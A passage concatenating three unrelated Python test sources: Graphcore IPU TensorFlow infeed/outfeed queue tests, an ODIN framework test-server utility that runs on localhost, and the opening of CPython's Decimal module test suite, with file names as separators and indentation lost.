with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
outfed = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
with self.assertRaisesRegex(errors.FailedPreconditionError,
r'Trying to get the last value from an'):
sess.run(outfed)
sess.run(res)
@test_util.deprecated_graph_mode_only
def testCannotFeedInt64(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = dataset_ops.Dataset.range(5)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def body(v, x):
v = v + math_ops.cast(x, np.int32)
return v
def my_net():
r = ipu.loops.repeat(5, body, (0,), infeed_queue)
return r
with ipu.scopes.ipu_scope("/device:IPU:0"):
ipu.ipu_compiler.compile(my_net, inputs=[])
with session_lib.Session() as sess:
with self.assertRaisesRegex(
errors.FailedPreconditionError,
"Unsupported datatype int64 on index 0 of feed operation"):
sess.run(infeed_queue.initializer)
@test_util.deprecated_graph_mode_only
def testFeedBools(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
left = [False, False, True, True]
right = [False, True, False, True]
dataset = dataset_ops.Dataset.from_tensor_slices((left, right))
dataset = dataset.batch(2, drop_remainder=True)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(l, r):
return outfeed_queue.enqueue(math_ops.logical_and(l, r))
def my_net():
return ipu.loops.repeat(2, body, infeed_queue=infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
dequeued = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(res)
out = sess.run(dequeued)
self.assertAllEqual(np.logical_and(left, right), np.concatenate(out))
@test_util.deprecated_graph_mode_only
def testHashTableInDataPipeline(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], np.int32)
table = lookup_ops.StaticHashTableV1(
initializer=lookup_ops.KeyValueTensorInitializer(keys, values),
default_value=-1)
dataset = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery".split()])
dataset = dataset.map(table.lookup)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
def my_net():
return infeed_queue._dequeue() # pylint: disable=protected-access
with ipu.scopes.ipu_scope("/device:IPU:0"):
[res] = ipu.ipu_compiler.compile(my_net)
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(table.initializer)
self.assertAllEqual([0, 0, -1, 1, 2], sess.run(res))
@test_util.deprecated_graph_mode_only
def testFeedInt8(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(10, dtype=np.int8, shape=[])
def m(x):
x = x - 5
return (x, math_ops.cast(x, np.uint8))
dataset = dataset.map(m)
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(x1, x2):
x1 = math_ops.cast(x1, np.float16)
x2 = math_ops.cast(x2, np.float32)
x1 = x1 + 1
x2 = x2 - 1
x1 = math_ops.cast(x1, np.int8)
x2 = math_ops.cast(x2, np.uint8)
return outfeed_queue.enqueue((x1, x2))
def my_net():
return ipu.loops.repeat(10, body, infeed_queue=infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
dequeued = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(res)
out = sess.run(dequeued)
self.assertAllEqual([-4, -3, -2, -1, 0, 1, 2, 3, 4, 5], out[0])
self.assertAllEqual([250, 251, 252, 253, 254, 255, 0, 1, 2, 3], out[1])
@test_util.deprecated_graph_mode_only
def test8bitOps(self):
cfg = ipu.config.IPUConfig()
cfg.ipu_model.compile_ipu_code = False
cfg.configure_ipu_system()
dataset = tu.create_single_increasing_dataset(1, dtype=np.int8, shape=[10])
dataset = dataset.map(lambda x: (x, math_ops.cast(x, np.uint8)))
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
def body(x1, x2):
results = [
array_ops.identity(x1),
array_ops.identity(x2),
array_ops.reshape(x1, shape=[2, 5]),
array_ops.reshape(x2, shape=[2, 5]),
array_ops.expand_dims(x1, axis=0),
array_ops.expand_dims(x2, axis=0),
array_ops.broadcast_to(x1, shape=[10, 10]),
array_ops.broadcast_to(x2, shape=[10, 10]),
]
return outfeed_queue.enqueue(results)
def my_net():
return ipu.loops.repeat(1, body, infeed_queue=infeed_queue)
with ipu.scopes.ipu_scope("/device:IPU:0"):
res = ipu.ipu_compiler.compile(my_net, inputs=[])
dequeued = outfeed_queue.dequeue()
with session_lib.Session() as sess:
sess.run(infeed_queue.initializer)
sess.run(res)
out = sess.run(dequeued)
self.assertAllEqual(np.full([1, 10], 0), out[0])
self.assertAllEqual(np.full([1, 10], 0), out[1])
self.assertAllEqual(np.full([1, 2, 5], 0), out[2])
self.assertAllEqual(np.full([1, 2, 5], 0), out[3])
self.assertAllEqual(np.full([1, 1, 10], 0), out[4])
self.assertAllEqual(np.full([1, 1, 10], 0), out[5])
self.assertAllEqual(np.full([1, 10, 10], 0), out[6])
self.assertAllEqual(np.full([1, 10, 10], 0), out[7])
@test_util.run_v2_only
def testDeduceDevice(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = [1, 1]
cfg.configure_ipu_system()
def fn(ordinal):
strategy = ipu.ipu_strategy.IPUStrategyV1(f"/device:IPU:{ordinal}")
with strategy.scope():
dataset = tu.create_single_increasing_dataset(10, shape=[4, 4])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
infeed_queue.initializer # pylint: disable=pointless-statement
def body(v, x):
v = v + x
outfeed = outfeed_queue.enqueue(v)
return (v, outfeed)
@def_function.function(experimental_compile=True)
def my_net(v):
r = ipu.loops.repeat(20, body, (v), infeed_queue)
return r
result = strategy.run(my_net, args=(np.ones([4, 4], np.float32),))
return result, outfeed_queue.dequeue()
self.assertAllClose(fn(0), fn(1))
@test_util.run_v2_only
def testInfeedSpec(self):
dataset = tu.create_single_increasing_dataset(10, dtype=np.int8, shape=[])
infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue(dataset)
with self.assertRaisesRegex(RuntimeError, "Spec for IPUInfeedQueue"):
spec = infeed_queue._type_spec # pylint: disable=protected-access
infeed_queue.initializer # pylint: disable=pointless-statement
# pylint: disable=protected-access
spec = infeed_queue._type_spec
self.assertEqual(spec._id, infeed_queue._id)
self.assertEqual(spec._structure, infeed_queue._structure)
self.assertEqual(spec._flat_structure, infeed_queue._flat_structure)
self.assertEqual(spec._device_ordinal, infeed_queue._device_ordinal)
self.assertEqual(spec._prefetch_depth, infeed_queue._prefetch_depth)
# pylint: enable=protected-access
ref_infeed_queue = ipu.ipu_infeed_queue.IPUInfeedQueue._from_type_spec( # pylint: disable=protected-access
spec)
self.assertIsInstance(ref_infeed_queue,
ipu.ipu_infeed_queue.IPUInfeedQueue)
with self.assertRaisesRegex(RuntimeError, "IPUInfeedQueue created"):
ref_infeed_queue.initializer # pylint: disable=pointless-statement
with self.assertRaisesRegex(RuntimeError, "IPUInfeedQueue created"):
ref_infeed_queue.deleter # pylint: disable=pointless-statement
@test_util.run_v2_only
def testScopedOuteed(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.ScopedIPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations):
x = constant_op.constant(1, dtype=np.int32, shape=[2])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue(x)
x += 1
strategy.run(my_net, args=(10,))
results = outfeed_queue.dequeue()
self.assertEqual(len(results), 10)
@test_util.run_v2_only
def testIPUIterator(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
dataset = tu.create_single_increasing_dataset(10, shape=[1])
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations, iterator):
x = constant_op.constant(1, dtype=np.int32, shape=[1])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue(next(iterator) + x)
x += 1
num_iterations = 5
infeed = ipu.ipu_infeed_queue.IPUIterator(dataset=dataset)
strategy.run(my_net, args=(num_iterations, infeed))
self.assertAllEqual([[[1]], [[3]], [[5]], [[7]], [[9]]],
outfeed_queue.dequeue())
infeed._infeed_queue.deleter # pylint: disable=pointless-statement,protected-access
class IPUOutfeedIteratorTest(test_util.TensorFlowTestCase,
parameterized.TestCase):
@test_util.run_v2_only
def testCreation(self):
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
self.assertIsInstance(iter(outfeed_queue),
ipu.ipu_outfeed_queue.IPUOutfeedQueueIterator)
with self.assertRaisesRegex(RuntimeError,
"IPUOutfeedQueue can only be iterated"):
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue(
outfeed_mode=ipu.ipu_outfeed_queue.IPUOutfeedMode.LAST)
iter(outfeed_queue) # pylint: disable=pointless-statement
@parameterized.parameters([1, 2])
@test_util.run_v2_only
def testOutputs(self, replication_factor):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = replication_factor
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations):
x = constant_op.constant(1, dtype=np.int32, shape=[2])
y = constant_op.constant(2, dtype=np.int32, shape=[])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue((x, y))
x += 1
y *= 2
def get_results():
results = []
x_ref = 1
y_ref = 2
x_shape = [2]
y_shape = []
if replication_factor > 1:
x_shape = [replication_factor] + x_shape
y_shape = [replication_factor] + y_shape
for x, y in outfeed_queue:
self.assertAllEqual(x, np.full(x_shape, x_ref))
self.assertAllEqual(y, np.full(y_shape, y_ref))
results.append((x, y))
x_ref += 1
y_ref *= 2
return results
with self.assertRaises(StopIteration):
next(iter(outfeed_queue)) # pylint: disable=pointless-statement
strategy.run(my_net, args=(10,))
self.assertEqual(len(get_results()), 10)
# Check that when there are no results, it still behaves correctly.
self.assertEqual(len(get_results()), 0)
strategy.run(my_net, args=(5,))
self.assertEqual(len(get_results()), 5)
@test_util.run_v2_only
def testParallelDequeue(self):
cfg = ipu.config.IPUConfig()
cfg.auto_select_ipus = 1
cfg.ipu_model.tiles_per_ipu = 4
cfg.configure_ipu_system()
outfeed_queue = ipu.ipu_outfeed_queue.IPUOutfeedQueue()
strategy = ipu.ipu_strategy.IPUStrategyV1()
with strategy.scope():
@def_function.function(experimental_compile=True)
def my_net(num_iterations):
x = constant_op.constant(1, dtype=np.int32, shape=[2])
for _ in math_ops.range(num_iterations):
outfeed_queue.enqueue({"key": x})
x += 1
results = []
def get_results(num_iterations):
x_ref = 1
while len(results) != num_iterations:
for z in outfeed_queue:
self.assertIsInstance(z, dict)
self.assertAllEqual(z["key"], np.full([2], x_ref))
x_ref += 1
results.append(x_ref)
num_iterations = 100
dequeue_thread = Thread(target=get_results, args=[num_iterations])
dequeue_thread.start()
strategy.run(my_net, args=(num_iterations,))
dequeue_thread.join()
self.assertEqual(len(results), num_iterations)
if __name__ == "__main__":
googletest.main()
|
utils.py
|
"""
Utility classes to support testing the ODIN framework
Tim Nicholls, STFC Application Engineering Group
"""
import sys
import time
import threading
import logging
import os
from tempfile import NamedTemporaryFile
if sys.version_info[0] == 3: # pragma: no cover
from configparser import ConfigParser
import asyncio
else: # pragma: no cover
from ConfigParser import SafeConfigParser as ConfigParser
from tornado.ioloop import IOLoop
from odin import server
def log_message_seen(caplog, level, message, when="call"):
for record in caplog.get_records(when):
if record.levelno == level and message in record.getMessage():
return True
return False
class OdinTestServer(object):
server_port = 8888
server_addr = '127.0.0.1'
server_api_version = 0.1
def __init__(self, server_port=server_port, adapter_config=None, access_logging=None):
self.server_thread = None
self.server_event_loop = None
self.server_conf_file = NamedTemporaryFile(mode='w+')
parser = ConfigParser()
file_dir = os.path.dirname(os.path.abspath(__file__))
static_path = os.path.join(file_dir, 'static')
parser.add_section('server')
parser.set('server', 'debug_mode', '1')
parser.set('server', 'http_port', str(server_port))
parser.set('server', 'http_addr', self.server_addr)
parser.set('server', 'static_path', static_path)
if adapter_config is not None:
adapters = ', '.join([adapter for adapter in adapter_config])
parser.set('server', 'adapters', adapters)
if access_logging is not None:
parser.set("server", 'access_logging', access_logging)
parser.add_section('tornado')
parser.set('tornado', 'logging', 'debug')
if adapter_config is not None:
for adapter in adapter_config:
section_name = 'adapter.{}'.format(adapter)
parser.add_section(section_name)
for param in adapter_config[adapter]:
parser.set(section_name, param, str(adapter_config[adapter][param]))
parser.write(self.server_conf_file)
self.server_conf_file.file.flush()
server_args = ['--config={}'.format(self.server_conf_file.name)]
self.server_thread = threading.Thread(target=self._run_server, args=(server_args,))
self.server_thread.start()
time.sleep(0.2)
def __del__(self):
self.stop()
def _run_server(self, server_args):
if sys.version_info[0] == 3: # pragma: no cover
asyncio.set_event_loop(asyncio.new_event_loop())
self.server_event_loop = IOLoop.current()
server.main(server_args)
def stop(self):
if self.server_thread is not None:
self.server_event_loop.add_callback(self.server_event_loop.stop)
self.server_thread.join()
self.server_thread = None
if self.server_conf_file is not None:
self.server_conf_file.close()
def build_url(self, resource, api_version=None):
if api_version is None:
api_version = self.server_api_version
return 'http://{}:{}/api/{}/{}'.format(
self.server_addr, self.server_port,
api_version, resource
)
|
test_decimal.py
|
# Copyright (c) 2004 Python Software Foundation.
# All rights reserved.
# Written by Eric Price <eprice at tjhsst.edu>
# and Facundo Batista <facundo at taniquetil.com.ar>
# and Raymond Hettinger <python at rcn.com>
# and Aahz (aahz at pobox.com)
# and Tim Peters
"""
These are the test cases for the Decimal module.
There are two groups of tests, Arithmetic and Behaviour. The former test
the Decimal arithmetic using the tests provided by Mike Cowlishaw. The latter
test the pythonic behaviour according to PEP 327.
Cowlishaw's tests can be downloaded from:
http://speleotrove.com/decimal/dectest.zip
This test module can be called from command line with one parameter (Arithmetic
or Behaviour) to test each part, or without parameter to test both parts. If
you're working through IDLE, you can import this test module and call test_main()
with the corresponding argument.
"""
import math
import os, sys
import operator
import warnings
import pickle, copy
import unittest
import numbers
import locale
from test.support import (run_unittest, run_doctest, is_resource_enabled,
requires_IEEE_754, requires_docstrings,
requires_legacy_unicode_capi, check_sanitizer)
from test.support import (TestFailed,
run_with_locale, cpython_only,
darwin_malloc_err_warning)
from test.support.import_helper import import_fresh_module
from test.support import threading_helper
from test.support import warnings_helper
import random
import inspect
import threading
if sys.platform == 'darwin':
darwin_malloc_err_warning('test_decimal')
C = import_fresh_module('decimal', fresh=['_decimal'])
P = import_fresh_module('decimal', blocked=['_decimal'])
import decimal as orig_sys_decimal
# fractions module must import the correct decimal module.
cfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = P
pfractions = import_fresh_module('fractions', fresh=['fractions'])
sys.modules['decimal'] = C
fractions = {C:cfractions, P:pfractions}
sys.modules['decimal'] = orig_sys_decimal
# Useful Test Constant
Signals = {
C: tuple(C.getcontext().flags.keys()) if C else None,
P: tuple(P.getcontext().flags.keys())
}
# Signals ordered with respect to precedence: when an operation
# produces multiple signals, signals occurring later in the list
# should be handled before those occurring earlier in the list.
OrderedSignals = {
C: [C.Clamped, C.Rounded, C.Inexact, C.Subnormal, C.Underflow,
C.Overflow, C.DivisionByZero, C.InvalidOperation,
C.FloatOperation] if C else None,
P: [P.Clamped, P.Rounded, P.Inexact, P.Subnormal, P.Underflow,
P.Overflow, P.DivisionByZero, P.InvalidOperation,
P.FloatOperation]
}
def assert_signals(cls, context, attr, expected):
d = getattr(context, attr)
cls.assertTrue(all(d[s] if s in expected else not d[s] for s in d))
ROUND_UP = P.ROUND_UP
ROUND_DOWN = P.ROUND_DOWN
ROUND_CEILING = P.ROUND_CEILING
ROUND_FLOOR = P.ROUND_FLOOR
ROUND_HALF_UP = P.ROUND_HALF_UP
ROUND_HALF_DOWN = P.ROUND_HALF_DOWN
ROUND_HALF_EVEN = P.ROUND_HALF_EVEN
ROUND_05UP = P.ROUND_05UP
RoundingModes = [
ROUND_UP, ROUND_DOWN, ROUND_CEILING, ROUND_FLOOR,
ROUND_HALF_UP, ROUND_HALF_DOWN, ROUND_HALF_EVEN,
ROUND_05UP
]
# Tests are built around these assumed context defaults.
# test_main() restores the original context.
ORIGINAL_CONTEXT = {
C: C.getcontext().copy() if C else None,
P: P.getcontext().copy()
}
def init(m):
if not m: return
DefaultTestContext = m.Context(
prec=9, rounding=ROUND_HALF_EVEN, traps=dict.fromkeys(Signals[m], 0)
)
m.setcontext(DefaultTestContext)
TESTDATADIR = 'decimaltestdata'
if __name__ == '__main__':
file = sys.argv[0]
else:
file = __file__
testdir = os.path.dirname(file) or os.curdir
directory = testdir + os.sep + TESTDATADIR + os.sep
skip_expected = not os.path.isdir(directory)
# Make sure it actually raises errors when not expected and caught in flags
# Slower, since it runs some things several times.
EXTENDEDERRORTEST = False
# Test extra functionality in the C version (-DEXTRA_FUNCTIONALITY).
EXTRA_FUNCTIONALITY = True if hasattr(C, 'DecClamped') else False
requires_extra_functionality = unittest.skipUnless(
EXTRA_FUNCTIONALITY, "test requires build with -DEXTRA_FUNCTIONALITY")
skip_if_extra_functionality = unittest.skipIf(
EXTRA_FUNCTIONALITY, "test requires regular build")
class IBMTestCases(unittest.TestCase):
"""Class which tests the Decimal class against the IBM test cases."""
def setUp(self):
self.context = self.decimal.Context()
self.readcontext = self.decimal.Context()
self.ignore_list = ['#']
# List of individual .decTest test ids that correspond to tests that
# we're skipping for one reason or another.
self.skipped_test_ids = set([
# Skip implementation-specific scaleb tests.
'scbx164',
'scbx165',
# For some operations (currently exp, ln, log10, power), the decNumber
# reference implementation imposes additional restrictions on the context
# and operands. These restrictions are not part of the specification;
# however, the effect of these restrictions does show up in some of the
# testcases. We skip testcases that violate these restrictions, since
# Decimal behaves differently from decNumber for these testcases so these
# testcases would otherwise fail.
'expx901',
'expx902',
'expx903',
'expx905',
'lnx901',
'lnx902',
'lnx903',
'lnx905',
'logx901',
'logx902',
'logx903',
'logx905',
'powx1183',
'powx1184',
'powx4001',
'powx4002',
'powx4003',
'powx4005',
'powx4008',
'powx4010',
'powx4012',
'powx4014',
])
if self.decimal == C:
# status has additional Subnormal, Underflow
self.skipped_test_ids.add('pwsx803')
self.skipped_test_ids.add('pwsx805')
# Correct rounding (skipped for decNumber, too)
self.skipped_test_ids.add('powx4302')
self.skipped_test_ids.add('powx4303')
self.skipped_test_ids.add('powx4342')
self.skipped_test_ids.add('powx4343')
# http://bugs.python.org/issue7049
self.skipped_test_ids.add('pwmx325')
self.skipped_test_ids.add('pwmx326')
# Map test directives to setter functions.
self.ChangeDict = {'precision' : self.change_precision,
'rounding' : self.change_rounding_method,
'maxexponent' : self.change_max_exponent,
'minexponent' : self.change_min_exponent,
'clamp' : self.change_clamp}
# Name adapter to be able to change the Decimal and Context
# interface without changing the test files from Cowlishaw.
self.NameAdapter = {'and':'logical_and',
'apply':'_apply',
'class':'number_class',
'comparesig':'compare_signal',
'comparetotal':'compare_total',
'comparetotmag':'compare_total_mag',
'copy':'copy_decimal',
'copyabs':'copy_abs',
'copynegate':'copy_negate',
'copysign':'copy_sign',
'divideint':'divide_int',
'invert':'logical_invert',
'iscanonical':'is_canonical',
'isfinite':'is_finite',
'isinfinite':'is_infinite',
'isnan':'is_nan',
'isnormal':'is_normal',
'isqnan':'is_qnan',
'issigned':'is_signed',
'issnan':'is_snan',
'issubnormal':'is_subnormal',
'iszero':'is_zero',
'maxmag':'max_mag',
'minmag':'min_mag',
'nextminus':'next_minus',
'nextplus':'next_plus',
'nexttoward':'next_toward',
'or':'logical_or',
'reduce':'normalize',
'remaindernear':'remainder_near',
'samequantum':'same_quantum',
'squareroot':'sqrt',
'toeng':'to_eng_string',
'tointegral':'to_integral_value',
'tointegralx':'to_integral_exact',
'tosci':'to_sci_string',
'xor':'logical_xor'}
# Map test-case names to roundings.
self.RoundingDict = {'ceiling' : ROUND_CEILING,
'down' : ROUND_DOWN,
'floor' : ROUND_FLOOR,
'half_down' : ROUND_HALF_DOWN,
'half_even' : ROUND_HALF_EVEN,
'half_up' : ROUND_HALF_UP,
'up' : ROUND_UP,
'05up' : ROUND_05UP}
# Map the test cases' error names to the actual errors.
self.ErrorNames = {'clamped' : self.decimal.Clamped,
'conversion_syntax' : self.decimal.InvalidOperation,
'division_by_zero' : self.decimal.DivisionByZero,
'division_impossible' : self.decimal.InvalidOperation,
'division_undefined' : self.decimal.InvalidOperation,
'inexact' : self.decimal.Inexact,
'invalid_context' : self.decimal.InvalidOperation,
'invalid_operation' : self.decimal.InvalidOperation,
'overflow' : self.decimal.Overflow,
'rounded' : self.decimal.Rounded,
'subnormal' : self.decimal.Subnormal,
'underflow' : self.decimal.Underflow}
# The following functions return True/False rather than a
# Decimal instance.
self.LogicalFunctions = ('is_canonical',
'is_finite',
'is_infinite',
'is_nan',
'is_normal',
'is_qnan',
'is_signed',
'is_snan',
'is_subnormal',
'is_zero',
'same_quantum')
def read_unlimited(self, v, context):
"""Work around the limitations of the 32-bit _decimal version. The
guaranteed maximum values for prec, Emax etc. are 425000000,
but higher values usually work, except for rare corner cases.
In particular, all of the IBM tests pass with maximum values
of 1070000000."""
if self.decimal == C and self.decimal.MAX_EMAX == 425000000:
self.readcontext._unsafe_setprec(1070000000)
self.readcontext._unsafe_setemax(1070000000)
self.readcontext._unsafe_setemin(-1070000000)
return self.readcontext.create_decimal(v)
else:
return self.decimal.Decimal(v, context)
def eval_file(self, file):
global skip_expected
if skip_expected:
raise unittest.SkipTest
with open(file, encoding="utf-8") as f:
for line in f:
line = line.replace('\r\n', '').replace('\n', '')
#print line
try:
t = self.eval_line(line)
except self.decimal.DecimalException as exception:
#Exception raised where there shouldn't have been one.
self.fail('Exception "'+exception.__class__.__name__ + '" raised on line '+line)
def eval_line(self, s):
if s.find(' -> ') >= 0 and s[:2] != '--' and not s.startswith(' --'):
s = (s.split('->')[0] + '->' +
s.split('->')[1].split('--')[0]).strip()
else:
s = s.split('--')[0].strip()
for ignore in self.ignore_list:
if s.find(ignore) >= 0:
#print s.split()[0], 'NotImplemented--', ignore
return
if not s:
return
elif ':' in s:
return self.eval_directive(s)
else:
return self.eval_equation(s)
def eval_directive(self, s):
funct, value = (x.strip().lower() for x in s.split(':'))
if funct == 'rounding':
value = self.RoundingDict[value]
else:
try:
value = int(value)
except ValueError:
pass
funct = self.ChangeDict.get(funct, (lambda *args: None))
funct(value)
def eval_equation(self, s):
if not TEST_ALL and random.random() < 0.90:
return
self.context.clear_flags()
try:
Sides = s.split('->')
L = Sides[0].strip().split()
id = L[0]
if DEBUG:
print("Test ", id, end=" ")
funct = L[1].lower()
valstemp = L[2:]
L = Sides[1].strip().split()
ans = L[0]
exceptions = L[1:]
except (TypeError, AttributeError, IndexError):
raise self.decimal.InvalidOperation
def FixQuotes(val):
val = val.replace("''", 'SingleQuote').replace('""', 'DoubleQuote')
val = val.replace("'", '').replace('"', '')
val = val.replace('SingleQuote', "'").replace('DoubleQuote', '"')
return val
if id in self.skipped_test_ids:
return
fname = self.NameAdapter.get(funct, funct)
if fname == 'rescale':
return
funct = getattr(self.context, fname)
vals = []
conglomerate = ''
quote = 0
theirexceptions = [self.ErrorNames[x.lower()] for x in exceptions]
for exception in Signals[self.decimal]:
self.context.traps[exception] = 1 #Catch these bugs...
for exception in theirexceptions:
self.context.traps[exception] = 0
for i, val in enumerate(valstemp):
if val.count("'") % 2 == 1:
quote = 1 - quote
if quote:
conglomerate = conglomerate + ' ' + val
continue
else:
val = conglomerate + val
conglomerate = ''
v = FixQuotes(val)
if fname in ('to_sci_string', 'to_eng_string'):
if EXTENDEDERRORTEST:
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(self.context.create_decimal(v))
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
v = self.context.create_decimal(v)
else:
v = self.read_unlimited(v, self.context)
vals.append(v)
ans = FixQuotes(ans)
if EXTENDEDERRORTEST and fname not in ('to_sci_string', 'to_eng_string'):
for error in theirexceptions:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s when %s disabled" % \
(e, s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
self.context.traps[error] = 0
# as above, but add traps cumulatively, to check precedence
ordered_errors = [e for e in OrderedSignals[self.decimal] if e in theirexceptions]
for error in ordered_errors:
self.context.traps[error] = 1
try:
funct(*vals)
except error:
pass
except Signals[self.decimal] as e:
self.fail("Raised %s in %s; expected %s" %
(type(e), s, error))
else:
self.fail("Did not raise %s in %s" % (error, s))
# reset traps
for error in ordered_errors:
self.context.traps[error] = 0
if DEBUG:
print("--", self.context)
try:
result = str(funct(*vals))
if fname in self.LogicalFunctions:
result = str(int(eval(result))) # 'True', 'False' -> '1', '0'
except Signals[self.decimal] as error:
self.fail("Raised %s in %s" % (error, s))
except: #Catch any error long enough to state the test case.
print("ERROR:", s)
raise
myexceptions = self.getexceptions()
myexceptions.sort(key=repr)
theirexceptions.sort(key=repr)
self.assertEqual(result, ans,
'Incorrect answer for ' + s + ' -- got ' + result)
self.assertEqual(myexceptions, theirexceptions,
'Incorrect flags set in ' + s + ' -- got ' + str(myexceptions))
def getexceptions(self):
return [e for e in Signals[self.decimal] if self.context.flags[e]]
def change_precision(self, prec):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setprec(prec)
else:
self.context.prec = prec
def change_rounding_method(self, rounding):
self.context.rounding = rounding
def change_min_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemin(exp)
else:
self.context.Emin = exp
def change_max_exponent(self, exp):
if self.decimal == C and self.decimal.MAX_PREC == 425000000:
self.context._unsafe_setemax(exp)
else:
self.context.Emax = exp
def change_clamp(self, clamp):
self.context.clamp = clamp
class CIBMTestCases(IBMTestCases):
decimal = C
class PyIBMTestCases(IBMTestCases):
decimal = P
# The following classes test the behaviour of Decimal according to PEP 327
class ExplicitConstructionTest(unittest.TestCase):
'''Unit tests for Explicit Construction cases of Decimal.'''
def test_explicit_empty(self):
Decimal = self.decimal.Decimal
self.assertEqual(Decimal(), Decimal("0"))
def test_explicit_from_None(self):
Decimal = self.decimal.Decimal
self.assertRaises(TypeError, Decimal, None)
def test_explicit_from_int(self):
Decimal = self.decimal.Decimal
#positive
d = Decimal(45)
self.assertEqual(str(d), '45')
#very large positive
d = Decimal(500000123)
self.assertEqual(str(d), '500000123')
#negative
d = Decimal(-45)
self.assertEqual(str(d), '-45')
#zero
d = Decimal(0)
self.assertEqual(str(d), '0')
# single word longs
for n in range(0, 32):
for sign in (-1, 1):
for x in range(-5, 5):
i = sign * (2**n + x)
d = Decimal(i)
self.assertEqual(str(d), str(i))
def test_explicit_from_string(self):
Decimal = self.decimal.Decimal
InvalidOperation = self.decimal.InvalidOperation
localcontext = self.decimal.localcontext
#empty
self.assertEqual(str(Decimal('')), 'NaN')
#int
self.assertEqual(str(Decimal('45')), '45')
#float
self.assertEqual(str(Decimal('45.34')), '45.34')
#engineer notation
self.assertEqual(str(Decimal('45e2')), '4.5E+3')
#just not a number
self.assertEqual(str(Decimal('ugly')), 'NaN')
#leading and trailing whitespace permitted
self.assertEqual(str(Decimal('1.3E4 \n')), '1.3E+4')
self.assertEqual(str(Decimal(' -7.89')), '-7.89')
self.assertEqual(str(Decimal(" 3.45679 ")), '3.45679')
# underscores
self.assertEqual(str(Decimal('1_3.3e4_0')), '1.33E+41')
self.assertEqual(str(Decimal('1_0_0_0')), '1000')
# unicode whitespace
for lead in ["", ' ', '\u00a0', '\u205f']:
for trail in ["", ' ', '\u00a0', '\u205f']:
self.assertEqual(str(Decimal(lead + '9.311E+28' + trail)),
'9.311E+28')
with localcontext() as c:
c.traps[InvalidOperation] = True
# Invalid string
self.assertRaises(InvalidOperation, Decimal, "xyz")
# Two arguments max
self.assertRaises(TypeError, Decimal, "1234", "x", "y")
# space within the numeric part
self.assertRaises(InvalidOperation, Decimal, "1\u00a02\u00a03")
self.assertRaises(InvalidOperation, Decimal, "\u00a01\u00a02\u00a0")
# unicode whitespace
self.assertRaises(InvalidOperation, Decimal, "\u00a0")
self.assertRaises(InvalidOperation, Decimal, "\u00a0\u00a0")
# embedded NUL
self.assertRaises(InvalidOperation, Decimal, "12\u00003")
# underscores don't prevent errors
self.assertRaises(InvalidOperation, Decimal, "1_2_\u00003")
@cpython_only
@requires_legacy_unicode_capi
